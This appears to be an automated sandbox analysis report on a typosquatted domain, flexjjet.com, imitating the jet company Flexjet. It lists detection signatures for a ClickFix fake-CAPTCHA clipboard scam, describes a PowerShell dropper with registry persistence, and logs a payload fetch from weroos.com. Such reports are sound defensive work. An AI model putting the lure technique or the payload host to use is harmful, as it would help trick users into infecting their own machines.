Windows Analysis Report
http://flexjjet.com

General Information

Sample URL:	http://flexjjet.com
Analysis ID:	1710272
Infos:	yarasigma

Detection

CAPTCHA Scam ClickFix

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Detect drive by download via clipboard copy & paste

Malicious sample detected (through community Yara rule)

Yara detected CAPTCHA Scam ClickFix

AI detected malicious Powershell script

AI detected suspicious URL

Bypasses PowerShell execution policy

Creates autostart registry keys with suspicious values (likely registry only malware)

Found pyInstaller with non standard icon

Found suspicious powershell code related to unpacking or dynamic code loading

HTML page adds supicious text to clipboard

Loading BitLocker PowerShell Module

Obfuscated command line found

Powershell drops PE file

Suspicious powershell command line found

Binary contains a suspicious time stamp

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

HTML body with high number of embedded images detected

HTML page contains hidden javascript code

HTTP GET or POST without a user agent

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Powershell In Registry Run Keys

Suricata IDS alerts with low severity for network traffic

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Signatures

Phishing

AI detected phishing page

Source: https://flexjjet.com/?type=3

Joe Sandbox AI: Score: 8 Reasons: The brand 'Flexjet' is a known private jet service provider., The URL 'flexjjet.com' contains a misspelling of the legitimate domain 'flexjet.com' with an extra 'j'., Misspellings in domain names are a common tactic used in phishing attempts., The URL does not match the legitimate domain name associated with the brand 'Flexjet'. DOM: 4.5.pages.csv

Yara detected CAPTCHA Scam ClickFix

Source: Yara match	File source: 4.6.pages.csv, type: HTML
Source: Yara match	File source: 4.5.pages.csv, type: HTML
Source: Yara match	File source: dropped/chromecache_2096, type: DROPPED

AI detected malicious Powershell script

Source: Dropped: runme.ps1.19.dr

Joe Sandbox AI: Found malicious Powershell script: Script shows multiple high-risk behaviors: downloads and executes code from suspicious domain (weroos.com), creates persistence in Temp directory, uses mutex to ensure single instance, installs crypto libraries, and performs hidden setup of Python environment. Pattern matches typical malware dropper/loader behavior.

AI detected suspicious URL

Source: http://flexjjet.com	Joe Sandbox AI: The URL 'http://flexjjet.com' closely resembles the legitimate URL 'http://flexjet.com', which is associated with the known brand Flexjet. The primary difference is the addition of an extra 'j' in the domain name, which is a common tactic in typosquatting to create visual similarity and potentially confuse users. There are no subdomains or unusual domain extensions that suggest a different legitimate purpose. The similarity score is high due to the minimal character difference, and the likelihood of typosquatting is also high given the context and the nature of the alteration.
Source: https://flexjjet.com	Joe Sandbox AI: The URL 'https://flexjjet.com' closely resembles the legitimate URL 'https://www.flexjet.com'. The primary difference is the addition of an extra 'j' in the domain name, which is a common tactic in typosquatting to create visual similarity and potentially confuse users. The legitimate brand, Flexjet, is a known private jet service provider. The similarity score is high due to the minimal character difference and the potential for user confusion. The likelihood of this being a typosquatting attempt is also high, given the structural similarity and the absence of any contextual indicators suggesting a different legitimate purpose for the domain.

HTML body with high number of embedded images detected

Source: https://duckduckgo.com/	HTTP Parser: Total embedded image size: 45036
Source: https://duckduckgo.com/?t=h_&q=flexjet&ia=web	HTTP Parser: Total embedded image size: 18122

HTML page contains hidden javascript code

Source: https://duckduckgo.com/

HTTP Parser: Base64 decoded: <svg fill="none" viewBox="0 0 189 53" xmlns="http://www.w3.org/2000/svg"> <path fill="#333" d="M110.045 24.224h-2.405l-4.378 4.502v-9.003h-1.85v15.354h1.85v-5.056l4.995 4.994.061.062h2.22v-.185l-5.611-5.55zm-11.898 8.223c-.679.678-1.666 1.048-2.775 1.04...

Source: https://flexjjet.com/	HTTP Parser: No favicon
Source: https://duckduckgo.com/?t=h_&q=flexjet&ia=web	HTTP Parser: No favicon
Source: https://flexjjet.com/?type=3	HTTP Parser: No favicon
Source: https://flexjjet.com/?type=3	HTTP Parser: No favicon

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Temp\PyEnv\LICENSE.txt

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.4:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.138.254:443 -> 192.168.2.16:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.63.92:443 -> 192.168.2.16:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.64.223:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.0.175:443 -> 192.168.2.16:49767 version: TLS 1.2

Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_elementtree.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_zoneinfo.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python.pdb source: python.exe, 00000018.00000000.1975619284.00007FF70C492000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_msi.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_decimal.pdb$$ source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5B1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python3.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: powershell.exe, 00000014.00000002.2430196928.0000025F2C5C4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\winsound.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp

Source: chrome.exe

Memory has grown: Private usage: 5MB later: 53MB

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=c&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=a279da2c5b244124869f757b83905435&ig=6cba30e9930b49e88e3d60ffd1f169de HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cm&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=a279da2c5b244124869f757b83905435&ig=a1891a94c2e8473fbfd7c148f4f4eab0 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cmd&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=a279da2c5b244124869f757b83905435&ig=980d29b949644590b7a121cb5baedd13 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic	HTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
Source: global traffic	HTTP traffic detected: GET /SDkwjk.txt HTTP/1.1Host: weroos.comConnection: Keep-Alive

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49737 -> 20.83.18.132:443

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 52.182.143.211
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.208

Source: C:\Temp\PyEnv\python.exe

Code function: 26_2_00007FF8068A57E0 recv,

26_2_00007FF8068A57E0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1host: flexjjet.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1host: flexjjet.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://flexjjet.com/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: _subid=33rpbio8in6ecookie: 7f3b8=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMzMlwiOjE3NDk1MDIwNDN9LFwiY2FtcGFpZ25zXCI6e1wiMTEzXCI6MTc0OTUwMjA0M30sXCJ0aW1lXCI6MTc0OTUwMjA0M30ifQ.io15MZ8hAmszvEd6-fhL5GBD-J4okyPU3j_xJ2ROQAEpriority: u=1, i
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=d&oit=1&cp=1&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ag5MNrHoG4V6seK&MD=DbLwmtSk HTTP/1.1host: slscr.update.microsoft.comaccept: /user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duc&oit=1&cp=3&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
